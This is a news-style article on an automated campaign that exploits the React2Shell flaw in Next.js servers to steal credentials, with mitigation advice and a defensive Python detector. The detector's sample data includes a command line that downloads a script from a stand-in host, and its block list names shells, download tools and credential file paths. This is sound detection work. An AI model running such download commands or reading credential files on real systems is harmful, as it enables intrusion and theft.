Massive React2Shell Attack Unleashes Devastating Credential Theft on Next.js Servers
Critical React2Shell Flaw Exploited Globally
Cybersecurity researchers at Cisco Talos have issued an urgent warning about a massive automated credential theft campaign actively targeting web applications worldwide. A sophisticated hacker group, tracked as UAT-10608, has already compromised over 700 servers by exploiting a critical security vulnerability known as React2Shell. This severe remote code execution flaw, identified as CVE-2025-55182, specifically targets Next.js applications.
The React2Shell vulnerability resides within React Server Components and allows an attacker to send a specially crafted web request. Because the server does not properly validate the data in that request, it ends up executing attacker-chosen commands without any authentication or user interaction, which makes this an extremely potent and dangerous attack vector.
Automated Exploitation & Data Harvesting
The UAT-10608 group employs automated tools to relentlessly scan the internet for vulnerable Next.js servers. Upon identifying a target, they immediately deploy the React2Shell exploit to gain initial unauthorized access. Following this initial breach, a malicious script is downloaded and installed onto the compromised server.
This script operates silently in the background, methodically searching server files, cloud configuration, and system memory. Its primary objective is to harvest a wide array of valuable credentials, acting like a digital vacuum cleaner. The process unfolds in multiple phases, systematically extracting everything from critical cloud tokens to sensitive database passwords. All stolen data is then exfiltrated to the hackers’ centralized command-and-control (C2) server.
NEXUS Listener: The Hackers’ Dashboard
To manage the staggering volume of stolen information, the attackers utilize a custom web dashboard named the “NEXUS Listener.” Cisco Talos researchers made a startling discovery: in a mere 24-hour period, this dashboard recorded 766 compromised hosts.
The NEXUS Listener dashboard provided a shocking glimpse into the scale and types of data theft:
- Over 90% of the compromised hosts had their database credentials stolen.
- Nearly 80% lost their private SSH keys, which are vital for secure server access.
- Hackers also successfully stole AWS cloud credentials, live Stripe payment keys, and valuable GitHub access tokens.
The Devastating Consequences of Credential Theft
The implications of this extensive attack are truly devastating. With stolen database passwords, attackers can gain unauthorized access to private user information, sensitive financial records, and other proprietary data. The exposure of SSH keys grants them the ability to move laterally and freely across various servers within a victim company’s network, escalating the breach.
Furthermore, compromised cloud credentials empower attackers to seize control over entire cloud environments, potentially leading to widespread service disruption, data manipulation, or further exploitation. The theft of GitHub tokens poses a significant risk, as these could be maliciously used to inject harmful code into legitimate software updates, affecting downstream users and supply chains.
Immediate Action Recommended to Mitigate React2Shell Threat
Companies utilizing Next.js applications must take swift and decisive action to protect themselves from this ongoing threat. Cybersecurity experts recommend the following urgent steps:
- Patch Immediately: Organizations must urgently update their web applications to patch the React2Shell vulnerability (CVE-2025-55182). This is the most critical first step to close the initial attack vector.
- Credential Rotation: Any company that suspects it might have been targeted should immediately change all its passwords, API keys, and security tokens across all systems and services.
- Restrict Cloud Access: Experts advise restricting access to cloud metadata services to only essential functions and authorized personnel.
- Monitor for Anomalies: Implement vigilant monitoring of servers for any unusual background processes or suspicious activity that could indicate an ongoing compromise.
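As an added illustration of the last step (this is example code written for this article, not tooling from Cisco Talos or from the campaign described above), the script below applies two host-level heuristics to a constructed process snapshot and a constructed list of file-access events: a Next.js server process that has spawned a shell or download utility, and a descendant of that server process reading credential material such as SSH keys, AWS credential files, or `.env` files. All process names, PIDs and paths are hypothetical sample data chosen to exercise the checks; the article publishes no indicators of its own.

```python
"""Heuristic detector for post-exploitation activity on a Next.js host.

Example code, not the article's or Talos's tooling. Input data is a constructed
process snapshot (as you might collect from `ps -eo pid,ppid,comm,args`) and a
constructed list of file-read events (as an auditd or EDR agent would emit).
"""
from dataclasses import dataclass
from typing import Dict, List, Set


@dataclass(frozen=True)
class Proc:
    pid: int
    ppid: int
    comm: str      # executable name, as in `ps -o comm`
    cmdline: str


@dataclass(frozen=True)
class FileEvent:
    pid: int
    path: str
    op: str        # "read", "write", ...


# Shells and fetch tools an application server has no business spawning.
SUSPICIOUS_CHILDREN = {"sh", "bash", "dash", "zsh", "curl", "wget", "python3", "perl"}


def web_server_pids(procs: List[Proc]) -> Set[int]:
    """PIDs that look like the Next.js application server (node running next/server)."""
    return {p.pid for p in procs
            if p.comm == "node" and ("next" in p.cmdline or "server.js" in p.cmdline)}


def ancestors(pid: int, by_pid: Dict[int, Proc]) -> List[int]:
    """Parent, grandparent, ... of pid; the `seen` set guards against cyclic data."""
    chain, seen = [], set()
    while pid in by_pid and pid not in seen:
        seen.add(pid)
        pid = by_pid[pid].ppid
        chain.append(pid)
    return chain


def descends_from_web_server(pid: int, by_pid: Dict[int, Proc], roots: Set[int]) -> bool:
    # The server itself is not its own descendant, so its legitimate startup
    # reads (for example of .env) are not flagged; only what it spawns is.
    return any(a in roots for a in ancestors(pid, by_pid))


def find_suspicious_children(procs: List[Proc]) -> List[Proc]:
    """Signal 1: a shell or downloader running underneath the web server process."""
    by_pid = {p.pid: p for p in procs}
    roots = web_server_pids(procs)
    return [p for p in procs
            if p.comm in SUSPICIOUS_CHILDREN and descends_from_web_server(p.pid, by_pid, roots)]


def is_credential_path(path: str) -> bool:
    """SSH private-key directories, AWS credential files and dotenv files."""
    name = path.rsplit("/", 1)[-1]
    return "/.ssh/" in path or path.endswith("/.aws/credentials") or name.startswith(".env")


def find_credential_reads(procs: List[Proc], events: List[FileEvent]) -> List[FileEvent]:
    """Signal 2: a descendant of the web server reading credential material."""
    by_pid = {p.pid: p for p in procs}
    roots = web_server_pids(procs)
    return [e for e in events
            if e.op == "read" and is_credential_path(e.path)
            and descends_from_web_server(e.pid, by_pid, roots)]


# Constructed sample data (hypothetical; not real telemetry).
PROCESSES = [
    Proc(1, 0, "systemd", "/sbin/init"),
    Proc(400, 1, "node", "node /srv/app/node_modules/.bin/next start"),
    Proc(401, 400, "sh", "sh -c wget -qO /tmp/h.sh http://example.invalid/h.sh"),
    Proc(402, 401, "wget", "wget -qO /tmp/h.sh http://example.invalid/h.sh"),
    Proc(403, 401, "python3", "python3 /tmp/h.py"),
    Proc(500, 1, "sshd", "/usr/sbin/sshd -D"),
    Proc(501, 500, "bash", "-bash"),       # an administrator's SSH session: benign
]
FILE_EVENTS = [
    FileEvent(403, "/home/app/.ssh/id_ed25519", "read"),
    FileEvent(403, "/srv/app/.env", "read"),
    FileEvent(501, "/home/admin/.ssh/id_ed25519", "read"),   # admin, not under node
    FileEvent(400, "/srv/app/.next/server/app/page.js", "read"),  # normal server read
]


def main() -> None:
    for p in find_suspicious_children(PROCESSES):
        print(f"ALERT process: pid={p.pid} ppid={p.ppid} {p.cmdline}")
    for e in find_credential_reads(PROCESSES, FILE_EVENTS):
        print(f"ALERT credential read: pid={e.pid} {e.path}")


if __name__ == "__main__":
    main()
```

On the sample data the detector flags the shell, the downloader and the Python process under the server, and the two credential reads by that Python process, while leaving the administrator's SSH session and the server's own file reads alone. In production the same two functions would be fed live `ps` output and file-access events from the host's audit agent rather than constructed lists.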
